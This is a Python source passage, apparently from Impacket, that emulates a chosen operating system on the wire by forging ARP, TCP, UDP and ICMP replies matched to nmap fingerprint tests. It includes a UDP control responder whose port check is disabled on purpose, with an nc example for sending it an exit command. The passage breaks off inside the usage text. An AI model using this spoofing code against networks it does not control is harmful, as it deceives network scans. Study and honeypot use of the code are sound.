        return in_onion[O_UDP].protocol == ImpactPacket.UDP.protocol
class OpenUDPResponder(UDPResponder):
    """Echoes an (empty) UDP datagram back from any open UDP port."""

    def isMine(self, in_onion):
        if not UDPResponder.isMine(self, in_onion):
            return False
        return self.machine.isUDPPortOpen(in_onion[O_UDP].get_uh_dport())

    def buildAnswer(self, in_onion):
        # Ethernet + IP layers, addresses already swapped by the base class.
        out_onion = IPResponder.buildAnswer(self, in_onion)

        probe_udp = in_onion[O_UDP]
        answer_udp = ImpactPacket.UDP()
        # Mirror the probe's port pair.
        answer_udp.set_uh_sport(probe_udp.get_uh_dport())
        answer_udp.set_uh_dport(probe_udp.get_uh_sport())

        out_onion[O_IP].contains(answer_udp)
        out_onion.append(answer_udp)
        return out_onion
class ClosedUDPResponder(UDPResponder):
    """Answers probes to closed UDP ports with ICMP port unreachable."""

    def isMine(self, in_onion):
        return (
            UDPResponder.isMine(self, in_onion) and
            not self.machine.isUDPPortOpen(in_onion[O_UDP].get_uh_dport()))

    def buildAnswer(self, in_onion):
        out_onion = IPResponder.buildAnswer(self, in_onion)
        icmp = ImpactPacket.ICMP()

        out_onion[O_IP].contains(icmp)
        out_onion.append(icmp)
        # Quote the offending datagram (from its IP header onwards) inside
        # the ICMP error, as destination-unreachable messages require.
        icmp.contains(in_onion[O_IP])
        out_onion += in_onion[O_IP:]

        icmp.set_icmp_type(icmp.ICMP_UNREACH)
        icmp.set_icmp_code(icmp.ICMP_UNREACH_PORT)
        return out_onion
class TCPResponder(IPResponder):
    """Base for TCP responders.

    Builds the common TCP reply skeleton (ports mirrored) and matches
    incoming probes against the template's TCP flags and options, which is
    how the different nmap TCP probes are told apart.
    """

    def buildAnswer(self, in_onion):
        out_onion = IPResponder.buildAnswer(self, in_onion)
        tcp = ImpactPacket.TCP()

        out_onion[O_IP].contains(tcp)
        out_onion.append(tcp)

        # Mirror the probe's port pair.
        tcp.set_th_dport(in_onion[O_TCP].get_th_sport())
        tcp.set_th_sport(in_onion[O_TCP].get_th_dport())
        return out_onion

    def sameTCPFlags(self, in_onion):
        # Compare the 12 TCP flag bits with the template probe's.
        if not self.template_onion: return True
        in_flags = in_onion[O_TCP].get_th_flags() & 0xfff
        t_flags = self.template_onion[O_TCP].get_th_flags() & 0xfff

        return in_flags == t_flags

    def sameTCPOptions(self, in_onion):
        # Compare the raw (padded) options bytes with the template probe's.
        if not self.template_onion: return True
        in_options = in_onion[O_TCP].get_padded_options()
        t_options = self.template_onion[O_TCP].get_padded_options()

        return in_options == t_options

    def isMine(self, in_onion):
        if not IPResponder.isMine(self, in_onion): return False
        if len(in_onion) < 3: return False

        return (
            in_onion[O_TCP].protocol == ImpactPacket.TCP.protocol and
            self.sameTCPFlags(in_onion) and
            self.sameTCPOptions(in_onion)
        )
class OpenTCPResponder(TCPResponder):
    """Replies SYN/ACK to connection attempts on open TCP ports."""

    def isMine(self, in_onion):
        if not TCPResponder.isMine(self, in_onion):
            return False
        probe_tcp = in_onion[O_TCP]
        return probe_tcp.get_SYN() and self.machine.isTCPPortOpen(probe_tcp.get_th_dport())

    def buildAnswer(self, in_onion):
        out_onion = TCPResponder.buildAnswer(self, in_onion)
        answer_tcp = out_onion[O_TCP]
        # Second step of the handshake: SYN/ACK acknowledging the probe's
        # sequence number + 1, carrying our own initial sequence number.
        answer_tcp.set_SYN()
        answer_tcp.set_ACK()
        answer_tcp.set_th_ack(in_onion[O_TCP].get_th_seq() + 1)
        answer_tcp.set_th_seq(self.machine.getTCPSequence())
        return out_onion
class ClosedTCPResponder(TCPResponder):
    """Replies RST/ACK to connection attempts on closed TCP ports."""

    def isMine(self, in_onion):
        if not TCPResponder.isMine(self, in_onion):
            return False
        probe_tcp = in_onion[O_TCP]
        return probe_tcp.get_SYN() and not self.machine.isTCPPortOpen(probe_tcp.get_th_dport())

    def buildAnswer(self, in_onion):
        out_onion = TCPResponder.buildAnswer(self, in_onion)
        answer_tcp = out_onion[O_TCP]
        # Reject the connection: RST/ACK acknowledging the probe's
        # sequence number + 1, with a fresh sequence number of our own.
        answer_tcp.set_RST()
        answer_tcp.set_ACK()
        answer_tcp.set_th_ack(in_onion[O_TCP].get_th_seq() + 1)
        answer_tcp.set_th_seq(self.machine.getTCPSequence())
        return out_onion
class UDPCommandResponder(OpenUDPResponder):
    """Out-of-band control channel over UDP.

    Understands two commands, optionally prefixed with 'cmd:':
      exit -- terminate the process,
      who  -- reply with the id of the emulated fingerprint.
    """
    # default UDP_CMD_PORT is 12345
    # use with:
    # echo cmd:exit | nc -u $(IP) $(UDP_CMD_PORT)
    # echo cmd:who  | nc -u $(IP) $(UDP_CMD_PORT)

    def set_port(self, port):
        # Register the command port as open; returns self so the call can
        # be chained at construction time.
        self.port = port
        self.machine.openUDPPort(port)
        return self

    def isMine(self, in_onion):
        # Port filtering is deliberately disabled (the intended check is
        # kept below, commented out): any open UDP port accepts commands.
        return (
            OpenUDPResponder.isMine(self, in_onion))# and
            #in_onion[O_UDP].get_uh_dport() == self.port)

    def buildAnswer(self, in_onion):
        cmd = in_onion[O_UDP_DATA].get_bytes().tostring()
        # Strip the optional 'cmd:' prefix and surrounding whitespace.
        if cmd[:4] == 'cmd:': cmd = cmd[4:].strip()
        print "Got command: %r" % cmd

        if cmd == 'exit':
            from sys import exit
            exit()

        out_onion = OpenUDPResponder.buildAnswer(self, in_onion)
        out_onion.append(ImpactPacket.Data())
        out_onion[O_UDP].contains(out_onion[O_UDP_DATA])
        if cmd == 'who':
            # Answer with the name of the signature being emulated.
            out_onion[O_UDP_DATA].set_data(self.machine.fingerprint.get_id())

        return out_onion
# NMAP2 specific responders
class NMAP2UDPResponder(ClosedUDPResponder):
    """Answers nmap's U1 probe (UDP to a closed port).

    Builds the ICMP port-unreachable reply and then mutates it field by
    field according to the 'U1' line of the emulated fingerprint.  Missing
    test values fall back to the defaults noted inline.
    """
    signatureName = 'U1'

    # No real need to filter
    # def isMine(self, in_onion):
    #     return (
    #         ClosedUDPResponder.isMine(self, inOnion) and
    #         (in_onion[O_UDP_DATA].get_size() == 300))

    def buildAnswer(self, in_onion):
        out_onion = ClosedUDPResponder.buildAnswer(self, in_onion)
        f = self.fingerprint

        # assume R = Y (a missing R test means "respond")
        try:
            if (f['R'] == 'N'): return None
        except: pass

        # Test DF: Don't fragment IP bit set = [YN]
        if (f['DF'] == 'Y'): out_onion[O_IP].set_ip_df(True)
        else: out_onion[O_IP].set_ip_df(False)

        self.setTTLFromFingerprint(out_onion)

        # UN: value of the ICMP header's unused field. Assume 0
        try: un = int(f['UN'],16)
        except: un = 0
        out_onion[O_ICMP].set_icmp_void(un)

        # RIPL: total length claimed for the quoted IP header.
        # Assume original packet just quoted
        try:
            ripl = int(f['RIPL'],16) # G generates exception
            out_onion[O_ICMP_DATA].set_ip_len(ripl)
        except:
            pass

        # RID: IP ID of the quoted packet. Assume original packet just quoted
        try:
            rid = int(f['RID'],16) # G generates exception
            out_onion[O_ICMP_DATA].set_ip_id(rid)
        except:
            pass

        # RIPCK: checksum of the quoted IP header.
        # I = invalid, Z = zero, G = good (leave auto checksum off so the
        # quoted value stays as captured).  Assume original packet just quoted
        try: ripck = f['RIPCK']
        except: ripck = 'G'
        if ripck == 'I': out_onion[O_ICMP_DATA].set_ip_sum(0x6765)
        elif ripck == 'Z': out_onion[O_ICMP_DATA].set_ip_sum(0)
        elif ripck == 'G': out_onion[O_ICMP_DATA].auto_checksum = 0

        # RUCK: checksum of the quoted UDP header.
        # Assume original packet just quoted
        try:
            ruck = int(f['RUCK'], 16)
            out_onion[O_ICMP_DATA+1].set_uh_sum(ruck)
        except:
            out_onion[O_ICMP_DATA+1].auto_checksum = 0

        # RUD: integrity of the quoted UDP payload ('I' replaces it with
        # 'G' filler bytes). Assume original packet just quoted
        try: rud = f['RUD']
        except: rud = 'G'
        if rud == 'I':
            udp_data = out_onion[O_ICMP_DATA+2]
            udp_data.set_data('G'*udp_data.get_size())

        # IPL: total length of the reply; trims or zero-pads the quoted
        # datagram to match. Assume all original packet is quoted
        # This has to be the last thing we do
        # as we are going to render the packet before doing it
        try: ipl = int(f['IPL'], 16)
        except: ipl = None

        if not ipl is None:
            data = out_onion[O_ICMP_DATA].get_packet()
            out_onion[O_ICMP].contains(ImpactPacket.Data())
            ip_and_icmp_len = out_onion[O_IP].get_size()
            data = data[:ipl - ip_and_icmp_len]
            data += '\x00'*(ipl-len(data)-ip_and_icmp_len)
            # Replace the structured quoted layers with the raw blob.
            out_onion = out_onion[:O_ICMP_DATA]
            out_onion.append(ImpactPacket.Data(data))
            out_onion[O_ICMP].contains(out_onion[O_ICMP_DATA])

        return out_onion
class NMAP2ICMPResponder(ICMPResponder):
    """Crafts ICMP echo replies according to the emulated fingerprint.

    Interprets the test values of the 'IE' line (DFI, DLI, SI, CD, TOSI)
    and shapes the reply's DF bit, payload, TTL, sequence number, ICMP
    code and TOS to match what the emulated OS would send.  Raises
    Exception for test values this implementation cannot reproduce.
    Missing test values fall back to the defaults noted inline.
    """

    def buildAnswer(self, in_onion):
        f = self.fingerprint

        # assume R = Y (a missing R test means "respond")
        try:
            if (f['R'] == 'N'): return None
        except: pass

        out_onion = ICMPResponder.buildAnswer(self, in_onion)

        # DFI: how the reply's Don't Fragment bit relates to the probe's.
        # assume DFI = N
        try: dfi = f['DFI']
        except: dfi = 'N'

        if dfi == 'N': out_onion[O_IP].set_ip_df(False)
        elif dfi == 'Y': out_onion[O_IP].set_ip_df(True)
        elif dfi == 'S': out_onion[O_IP].set_ip_df(in_onion[O_IP].get_ip_df())       # same as probe
        elif dfi == 'O': out_onion[O_IP].set_ip_df(not in_onion[O_IP].get_ip_df())   # opposite of probe
        else: raise Exception('Unsupported IE(DFI=%s)' % dfi)

        # DLI: reply payload; S echoes the probe's data back, Z sends none.
        # assume DLI = S
        try: dli = f['DLI']
        except: dli = 'S'

        if dli == 'S': out_onion[O_ICMP].contains(in_onion[O_ICMP_DATA])
        # BUG FIX: this error message previously said "DFI" although it
        # reports an unsupported DLI value.
        elif dli != 'Z': raise Exception('Unsupported IE(DLI=%s)' % dli)

        self.setTTLFromFingerprint(out_onion)

        # SI: ICMP sequence number of the reply. assume SI = S
        try: si = f['SI']
        except: si = 'S'

        if si == 'S': out_onion[O_ICMP].set_icmp_seq(in_onion[O_ICMP].get_icmp_seq())
        elif si == 'Z': out_onion[O_ICMP].set_icmp_seq(0) # this is not currently supported by nmap, but I've done it already
        else:
            try: out_onion[O_ICMP].set_icmp_seq(int(si, 16)) # this is not supported either by nmap
            except: raise Exception('Unsupported IE(SI=%s)' % si)

        # CD: ICMP code of the reply. assume CD = S
        try: cd = f['CD']
        except: cd = 'S'

        if cd == 'Z': out_onion[O_ICMP].set_icmp_code(0)
        elif cd == 'S': out_onion[O_ICMP].set_icmp_code(in_onion[O_ICMP].get_icmp_code())
        elif cd == 'O': out_onion[O_ICMP].set_icmp_code(in_onion[O_ICMP].get_icmp_code()+1) # no examples in DB
        else:
            try: out_onion[O_ICMP].set_icmp_code(int(cd, 16)) # documented, but no examples available
            except: raise Exception('Unsupported IE(CD=%s)' % cd)

        # TOSI: IP type-of-service of the reply. assume TOSI = S
        try: tosi = f['TOSI']
        except: tosi = 'S'

        if tosi == 'Z': out_onion[O_IP].set_ip_tos(0)
        elif tosi == 'S': out_onion[O_IP].set_ip_tos(in_onion[O_IP].get_ip_tos())
        elif tosi == 'O': out_onion[O_IP].set_ip_tos(in_onion[O_IP].get_ip_tos()+1) # no examples in DB
        else:
            try: out_onion[O_IP].set_ip_tos(int(tosi, 16)) # documented, but no examples available
            except: raise Exception('Unsupported IE(TOSI=%s)' % tosi)

        return out_onion
class NMAP2TCPResponder(TCPResponder):
    """Builds TCP replies whose fields follow the emulated fingerprint.

    buildAnswer() interprets the test values of the signature line this
    responder was configured with (T1-T7 or ECN) and shapes the reply's
    IP and TCP headers accordingly.  Missing test values fall back to the
    defaults noted inline.
    """

    def buildAnswer(self, in_onion):
        out_onion = TCPResponder.buildAnswer(self, in_onion)
        f = self.fingerprint

        # Test R: There is a response = [YN]
        if (f['R'] == 'N'): return None

        # Test DF: Don't fragment IP bit set = [YN]
        if (f['DF'] == 'Y'): out_onion[O_IP].set_ip_df(True)
        else: out_onion[O_IP].set_ip_df(False)

        # Test W: Initial TCP windows size (hex); defaults to 0.
        try: win = int(f['W'],16)
        except: win = 0
        out_onion[O_TCP].set_th_win(win)

        self.setTTLFromFingerprint(out_onion)

        # Test CC: Explicit congestion notification
        # Two TCP flags are used in this test: ECE and CWR
        try:
            cc = f['CC']
            if cc == 'N': ece,cwr = 0,0
            if cc == 'Y': ece,cwr = 1,0
            if cc == 'S': ece,cwr = 1,1
            if cc == 'O': ece,cwr = 0,1
        except:
            ece,cwr = 0,0
        if ece: out_onion[O_TCP].set_ECE()
        else: out_onion[O_TCP].reset_ECE()
        if cwr: out_onion[O_TCP].set_CWR()
        else: out_onion[O_TCP].reset_CWR()

        # Test O: TCP Options
        try: options = f['O']
        except: options = ''
        self.setTCPOptions(out_onion, options)

        # Test S: TCP Sequence number
        # Z: Sequence number is zero
        # A: Sequence number is the same as the ACK in the probe
        # A+: Sequence number is the same as the ACK in the probe + 1
        # O: Other value
        try: s = f['S']
        except: s = 'O'
        if s == 'Z': out_onion[O_TCP].set_th_seq(0)
        if s == 'A': out_onion[O_TCP].set_th_seq(in_onion[O_TCP].get_th_ack())
        if s == 'A+': out_onion[O_TCP].set_th_seq(in_onion[O_TCP].get_th_ack()+1)
        if s == 'O': out_onion[O_TCP].set_th_seq(self.machine.getTCPSequence())

        # Test A: TCP ACK number
        # Z: Ack is zero
        # S: Ack is the same as the Squence number in the probe
        # S+: Ack is the same as the Squence number in the probe + 1
        # O: Other value
        try: a = f['A']
        except: a = 'O'
        if a == 'Z': out_onion[O_TCP].set_th_ack(0)
        if a == 'S': out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq())
        if a == 'S+': out_onion[O_TCP].set_th_ack(in_onion[O_TCP].get_th_seq()+1)

        # Test Q: Quirks
        # R: Reserved bit set (right after the header length)
        # U: Urgent pointer non-zero and URG flag clear
        try:
            if 'R' in f['Q']: out_onion[O_TCP].set_flags(0x800)
        except: pass
        try:
            if 'U' in f['Q']: out_onion[O_TCP].set_th_urp(0xffff)
        except: pass

        # Test F: TCP Flags
        try: flags = f['F']
        except: flags = ''
        if 'E' in flags: out_onion[O_TCP].set_ECE()
        if 'U' in flags: out_onion[O_TCP].set_URG()
        if 'A' in flags: out_onion[O_TCP].set_ACK()
        if 'P' in flags: out_onion[O_TCP].set_PSH()
        if 'R' in flags: out_onion[O_TCP].set_RST()
        if 'S' in flags: out_onion[O_TCP].set_SYN()
        if 'F' in flags: out_onion[O_TCP].set_FIN()

        # Test RD: TCP Data checksum (mostly for data in RST)
        # A non-zero RD is the checksum of the text some OSes send inside
        # the RST; uncrc32.compensate() appends bytes to our own text so
        # the reply yields exactly that checksum value.
        try:
            crc = f['RD']
            if crc != '0': # RD == '0' means the RST carries no data
                crc = int(crc, 16)
                data = 'TCP Port is closed\x00'
                data += uncrc32.compensate(data, crc)
                data = ImpactPacket.Data(data)
                out_onion.append(data)
                out_onion[O_TCP].contains(data)
        except:
            pass

        return out_onion

    def setTCPOptions(self, onion, options):
        """Append TCP options to onion's TCP layer per an nmap 'O' string."""
        def getValue(string, i):
            # Consume hex digits from the options string starting at i;
            # return the accumulated value and the first non-hex index.
            value = 0

            idx = i
            for c in options[i:]:
                try:
                    value = value * 0x10 + int(c,16)
                except:
                    break
                idx += 1

            return value, idx

        # Test O,O1=O6: TCP Options
        # L: End of Options
        # N: NOP
        # S: Selective ACK
        # Mx: MSS (x is a hex number)
        # Wx: Windows Scale (x is a hex number)
        # Tve: Timestamp (v and e are two binary digits, v for TSval and e for TSecr
        i = 0
        tcp = onion[O_TCP]
        while i < len(options):
            opt = options[i]
            i += 1
            if opt == 'L': tcp.add_option(TCPOption(TCPOption.TCPOPT_EOL))
            if opt == 'N': tcp.add_option(TCPOption(TCPOption.TCPOPT_NOP))
            if opt == 'S': tcp.add_option(TCPOption(TCPOption.TCPOPT_SACK_PERMITTED))
            if opt == 'T':
                opt = TCPOption(TCPOption.TCPOPT_TIMESTAMP) # default ts = 0, ts_echo = 0
                if options[i] == '1': opt.set_ts(self.machine.getTCPTimeStamp())
                if options[i+1] == '1': opt.set_ts_echo(0xffffffffL)
                tcp.add_option(opt)
                i += 2 # skip the two v/e digits
            if opt == 'M':
                maxseg, i = getValue(options, i)
                tcp.add_option(TCPOption(TCPOption.TCPOPT_MAXSEG, maxseg))
            if opt == 'W':
                window, i = getValue(options, i)
                tcp.add_option(TCPOption(TCPOption.TCPOPT_WINDOW, window))
class nmap2_SEQ(NMAP2TCPResponder):
    # Base class for the six SEQ probes.  Subclasses set ``seqNumber`` so each
    # probe answers with the per-probe TCP options (O1-O6) and window size
    # (W1-W6) taken from the fingerprint's OPS/WIN tables.
    templateClass = None
    signatureName = None
    seqNumber = None
    def initFingerprint(self):
        # Start from the shared T1 fingerprint, then overlay this probe's
        # own option string and window size.
        NMAP2TCPResponder.initFingerprint(self)
        if not self.seqNumber: return
        else:
            OPS = self.machine.fingerprint.get_tests()['OPS']
            WIN = self.machine.fingerprint.get_tests()['WIN']
            self.fingerprint['O'] = OPS['O%d' % self.seqNumber]
            self.fingerprint['W'] = WIN['W%d' % self.seqNumber]
class nmap2_ECN(NMAP2TCPResponder):
    # Responder for nmap's explicit congestion notification (ECN) probe.
    templateClass = os_ident.nmap2_ecn_probe
    signatureName = 'ECN'
class nmap2_SEQ1(nmap2_SEQ):
    # First of the six closely spaced SYN probes; results feed the T1 line.
    templateClass = os_ident.nmap2_seq_1
    signatureName = 'T1'
    seqNumber = 1
class nmap2_SEQ2(nmap2_SEQ):
    # Second SEQ probe (see nmap2_SEQ).
    templateClass = os_ident.nmap2_seq_2
    signatureName = 'T1'
    seqNumber = 2
class nmap2_SEQ3(nmap2_SEQ):
    # Third SEQ probe (see nmap2_SEQ).
    templateClass = os_ident.nmap2_seq_3
    signatureName = 'T1'
    seqNumber = 3
class nmap2_SEQ4(nmap2_SEQ):
    # Fourth SEQ probe (see nmap2_SEQ).
    templateClass = os_ident.nmap2_seq_4
    signatureName = 'T1'
    seqNumber = 4
class nmap2_SEQ5(nmap2_SEQ):
    # Fifth SEQ probe (see nmap2_SEQ).
    templateClass = os_ident.nmap2_seq_5
    signatureName = 'T1'
    seqNumber = 5
class nmap2_SEQ6(nmap2_SEQ):
    # Sixth SEQ probe (see nmap2_SEQ).
    templateClass = os_ident.nmap2_seq_6
    signatureName = 'T1'
    seqNumber = 6
class nmap2_T2(NMAP2TCPResponder):
    # Responder for nmap's T2 probe (sent to an open TCP port).
    templateClass = os_ident.nmap2_tcp_open_2
    signatureName = 'T2'
class nmap2_T3(NMAP2TCPResponder):
    # Responder for nmap's T3 probe (sent to an open TCP port).
    templateClass = os_ident.nmap2_tcp_open_3
    signatureName = 'T3'
class nmap2_T4(NMAP2TCPResponder):
    # Responder for nmap's T4 probe (sent to an open TCP port).
    templateClass = os_ident.nmap2_tcp_open_4
    signatureName = 'T4'
class nmap2_T5(NMAP2TCPResponder):
    # Responder for nmap's T5 probe (sent to a closed TCP port).
    templateClass = os_ident.nmap2_tcp_closed_1
    signatureName = 'T5'
class nmap2_T6(NMAP2TCPResponder):
    # Responder for nmap's T6 probe (sent to a closed TCP port).
    templateClass = os_ident.nmap2_tcp_closed_2
    signatureName = 'T6'
class nmap2_T7(NMAP2TCPResponder):
    # Responder for nmap's T7 probe (sent to a closed TCP port).
    templateClass = os_ident.nmap2_tcp_closed_3
    signatureName = 'T7'
class nmap2_ICMP_1(NMAP2ICMPResponder):
    # Responder for nmap's first ICMP echo probe (IE test).
    templateClass = os_ident.nmap2_icmp_echo_probe_1
    signatureName = 'IE'
class nmap2_ICMP_2(NMAP2ICMPResponder):
    # Responder for nmap's second ICMP echo probe (IE test).
    templateClass = os_ident.nmap2_icmp_echo_probe_2
    signatureName = 'IE'
class Machine:
    """One emulated host on the wire.

    Sniffs frames addressed to its IP/MAC via pcap and lets the registered
    responders forge replies whose quirks match a fingerprint loaded from an
    nmap-os-db file, so nmap identifies the emulated OS.
    """
    # Rough spacing nmap leaves between consecutive probes; the ISN and
    # timestamp generators scale their per-packet deltas by this value.
    AssumedTimeIntervalPerPacket = 0.11 # seconds
    def __init__(self, emmulating, interface, ipAddress, macAddress, openTCPPorts = [], openUDPPorts = [], nmapOSDB = 'nmap-os-db'):
        # emmulating: fingerprint name to look up in ``nmapOSDB``.
        # NOTE(review): the mutable list defaults are shared across instances;
        # harmless only while a single Machine is created per run.
        self.interface = interface
        self.ipAddress = ipAddress
        self.macAddress = macAddress
        self.responders = []
        self.decoder = ImpactDecoder.EthDecoder()
        self.initPcap()
        self.initFingerprint(emmulating, nmapOSDB)
        self.initSequenceGenerators()
        self.openTCPPorts = openTCPPorts
        self.openUDPPorts = openUDPPorts
        print self
    def openUDPPort(self, port):
        # Mark a UDP port as open (idempotent).
        if self.isUDPPortOpen(port): return
        self.openUDPPorts.append(port)
    def isUDPPortOpen(self, port):
        return port in self.openUDPPorts
    def isTCPPortOpen(self, port):
        return port in self.openTCPPorts
    def initPcap(self):
        # Capture every frame for our IP or MAC address.  The except branch
        # retries with the older 3-argument setfilter() signature.
        self.pcap = pcapy.open_live(self.interface, 65535, 1, 0)
        try: self.pcap.setfilter("host %s or ether host %s" % (self.ipAddress, self.macAddress))
        except: self.pcap.setfilter("host %s or ether host %s" % (self.ipAddress, self.macAddress), 1, 0xFFFFFF00)
    def initGenericResponders(self):
        # generic responders (ARP plus plain open/closed TCP/UDP behaviour)
        self.addResponder(ARPResponder(self))
        self.addResponder(OpenUDPResponder(self))
        self.addResponder(ClosedUDPResponder(self))
        self.addResponder(OpenTCPResponder(self))
        self.addResponder(ClosedTCPResponder(self))
    def initFingerprint(self, emmulating, nmapOSDB):
        # Scan the nmap-os-db file for the fingerprint named ``emmulating``.
        fpm = os_ident.NMAP2_Fingerprint_Matcher('')
        f = file(nmapOSDB, 'r')
        for text in fpm.fingerprints(f):
            fingerprint = fpm.parse_fp(text)
            if fingerprint.get_id() == emmulating:
                self.fingerprint = fingerprint
                self.simplifyFingerprint()
                # print fingerprint
                return
        raise Exception, "Couldn't find fingerprint data for %r" % emmulating
    def simplifyFingerprint(self):
        # Where the database lists alternatives ("A|B|C") keep only the first,
        # so every test has a single concrete value to emulate.
        tests = self.fingerprint.get_tests()
        for probeName in tests:
            probe = tests[probeName]
            for test in probe:
                probe[test] = probe[test].split('|')[0]
    def initSequenceGenerators(self):
        # Seed the IP ID, TCP ISN and TCP timestamp generators.
        self.initIPIDGenerator()
        self.initTCPISNGenerator()
        self.initTCPTSGenerator()
    def initIPIDGenerator(self):
        # Choose IP ID increments that reproduce the fingerprint's TI
        # (TCP), II (ICMP) and SS (shared sequence) classifications.
        seq = self.fingerprint.get_tests()['SEQ']
        self.ip_ID = 0
        try: TI = seq['TI']
        except: TI = 'O'
        if TI == 'Z': self.ip_ID_delta = 0
        elif TI == 'RD': self.ip_ID_delta = 30000
        elif TI == 'RI': self.ip_ID_delta = 1234
        elif TI == 'BI': self.ip_ID_delta = 1024+256
        elif TI == 'I': self.ip_ID_delta = 1
        elif TI == 'O': self.ip_ID_delta = 123
        else: self.ip_ID_delta = int(TI, 16)
        try: ss = seq['SS']
        except: ss = 'O'
        self.ip_ID_ICMP_delta = None
        # SS == 'S' means ICMP shares the TCP IP ID counter.
        if ss == 'S': self.ip_ID_ICMP = None
        else:
            self.ip_ID_ICMP = 0
            try: II = seq['II']
            except: II = 'O'
            if II == 'Z': self.ip_ID_ICMP_delta = 0
            elif II == 'RD': self.ip_ID_ICMP_delta = 30000
            elif II == 'RI': self.ip_ID_ICMP_delta = 1234
            elif II == 'BI': self.ip_ID_ICMP_delta = 1024+256
            elif II == 'I': self.ip_ID_ICMP_delta = 1
            elif II == 'O': self.ip_ID_ICMP_delta = 123
            else: self.ip_ID_ICMP_delta = int(II, 16)
        # generate a few, so we don't start with 0 when we don't have to
        for i in range(10):
            self.getIPID()
            self.getIPID_ICMP()
        print "IP ID Delta: %d" % self.ip_ID_delta
        print "IP ID ICMP Delta: %s" % self.ip_ID_ICMP_delta
    def initTCPISNGenerator(self):
        # tcp_ISN and tcp_ISN_delta for TCP Initial sequence numbers
        # Derives the ISN increment (from ISR) and jitter (from SP) so the
        # emulated counter rate matches the fingerprint's SEQ() line.
        self.tcp_ISN = 0
        try:
            self.tcp_ISN_GCD = int(self.fingerprint.get_tests()['SEQ']['GCD'].split('-')[0], 16)
        except:
            self.tcp_ISN_GCD = 1
        try:
            isr = self.fingerprint.get_tests()['SEQ']['ISR'].split('-')
            if len(isr) == 1:
                isr = int(isr[0], 16)
            else:
                # ranges like "C8-D2" are collapsed to their midpoint
                isr = (int(isr[0], 16) + int(isr[1], 16)) / 2
        except:
            isr = 0
        try:
            sp = self.fingerprint.get_tests()['SEQ']['SP'].split('-')
            sp = int(sp[0], 16)
        except:
            sp = 0
        self.tcp_ISN_stdDev = (2**(sp/8.0)) * 5 / 4 # n-1 on small populations... erm...
        if self.tcp_ISN_GCD > 9:
            self.tcp_ISN_stdDev *= self.tcp_ISN_GCD
        self.tcp_ISN_stdDev *= self.AssumedTimeIntervalPerPacket
        self.tcp_ISN_delta = 2**(isr/8.0) * self.AssumedTimeIntervalPerPacket
        # generate a few, so we don't start with 0 when we don't have to
        for i in range(10): self.getTCPSequence()
        print "TCP ISN Delta: %f" % self.tcp_ISN_delta
        print "TCP ISN Standard Deviation: %f" % self.tcp_ISN_stdDev
    def initTCPTSGenerator(self):
        # tcp_TS and tcp_TS_delta for TCP Time stamp generation
        # TS encodes log2 of the timestamp clock frequency; 'U'/'Z' mean
        # unsupported / always zero.
        self.tcp_TS = 0
        try: ts = self.fingerprint.get_tests()['SEQ']['TS']
        except: ts = 'U'
        if ts == 'U' or ts == 'Z': self.tcp_TS_delta = 0
        else:
            self.tcp_TS_delta = (2**int(ts, 16)) * self.AssumedTimeIntervalPerPacket
        # generate a few, so we don't start with 0 when we don't have to
        for i in range(10): self.getTCPTimeStamp()
        print "TCP TS Delta: %f" % self.tcp_TS_delta
    def getIPID(self):
        # Next 16-bit IP ID for TCP/UDP replies.
        answer = self.ip_ID
        self.ip_ID += self.ip_ID_delta
        self.ip_ID %= 0x10000L
        # print "IP ID: %x" % answer
        return answer
    def getIPID_ICMP(self):
        # Next IP ID for ICMP replies; falls back to the shared TCP counter
        # when the fingerprint declared SS == 'S'.
        if self.ip_ID_ICMP is None:
            return self.getIPID()
        answer = self.ip_ID_ICMP
        self.ip_ID_ICMP += self.ip_ID_ICMP_delta
        self.ip_ID_ICMP %= 0x10000L
        # print "---> IP ID: %x" % answer
        return answer
    def getTCPSequence(self):
        # Next 32-bit ISN: counter plus alternating +/- jitter, rounded down
        # to a multiple of the fingerprint's GCD.
        answer = self.tcp_ISN + self.tcp_ISN_stdDev # *random.random()
        self.tcp_ISN_stdDev *= -1
        answer = int(int(answer/self.tcp_ISN_GCD) * self.tcp_ISN_GCD)
        self.tcp_ISN += self.tcp_ISN_delta
        self.tcp_ISN %= 0x100000000L
        # print "---> TCP Sequence: %d" % (answer % 0x100000000L)
        return answer % 0x100000000L
    def getTCPTimeStamp(self):
        # Next 32-bit TCP timestamp value.
        answer = int(round(self.tcp_TS))
        self.tcp_TS += self.tcp_TS_delta
        self.tcp_TS %= 0x100000000L
        # print "---> TCP Time Stamp: %x" % answer
        return answer
    def sendPacket(self, onion):
        # Inject a forged reply (``onion`` is the protocol-layer list built
        # by a responder); None/empty means "do not answer".
        if not onion: return
        print "--> Packet sent:"
        #print onion[0]
        #print
        self.pcap.sendpacket(onion[O_ETH].get_packet())
    def addResponder(self, aResponder):
        self.responders.append(aResponder)
    def run(self):
        # Main loop: decode each sniffed frame into a list of nested protocol
        # layers and hand it to the first responder that claims it.
        while 1:
            p = self.pcap.next()
            # older/newer pcapy return (header, data) vs data -- try both
            try: in_onion = [self.decoder.decode(p[1])]
            except: in_onion = [self.decoder.decode(p[0])]
            try:
                while 1: in_onion.append(in_onion[-1].child())
            except:
                pass
            #print "-------------- Received: ", in_onion[0]
            for r in self.responders:
                if r.process(in_onion): break
def main():
    # Entry point: parse command-line flags, build the emulated Machine and
    # run its capture/respond loop forever.  Relies on module-level defaults
    # (Fingerprint, IFACE, MAC, IP, OPEN_TCP_PORTS, OPEN_UDP_PORTS, nmapOSDB)
    # defined earlier in the file.
    def initResponders(machine):
        # cmd responder
        # machine.addResponder(UDPCommandResponder(machine).set_port(UDP_CMD_PORT))
        # nmap2 specific responders
        machine.addResponder(nmap2_SEQ1(machine))
        machine.addResponder(nmap2_SEQ2(machine))
        machine.addResponder(nmap2_SEQ3(machine))
        machine.addResponder(nmap2_SEQ4(machine))
        machine.addResponder(nmap2_SEQ5(machine))
        machine.addResponder(nmap2_SEQ6(machine))
        machine.addResponder(nmap2_ECN(machine))
        machine.addResponder(nmap2_T2(machine))
        machine.addResponder(nmap2_T3(machine))
        machine.addResponder(nmap2_T4(machine))
        machine.addResponder(nmap2_T5(machine))
        machine.addResponder(nmap2_T6(machine))
        machine.addResponder(nmap2_T7(machine))
        machine.addResponder(nmap2_ICMP_1(machine))
        machine.addResponder(nmap2_ICMP_2(machine))
        machine.addResponder(NMAP2UDPResponder(machine))
    from sys import argv, exit
    def usage():
        # The help text is (deliberately) a verbatim dump of the option
        # parsing code below.
        print """
    if arg == '-h': usage()
    if arg == '--help': usage()
    if arg == '-f': Fingerprint = value
    if arg == '-p': IP = value
    if arg == '-m': MAC = value
    if arg == '-i': IFACE = value
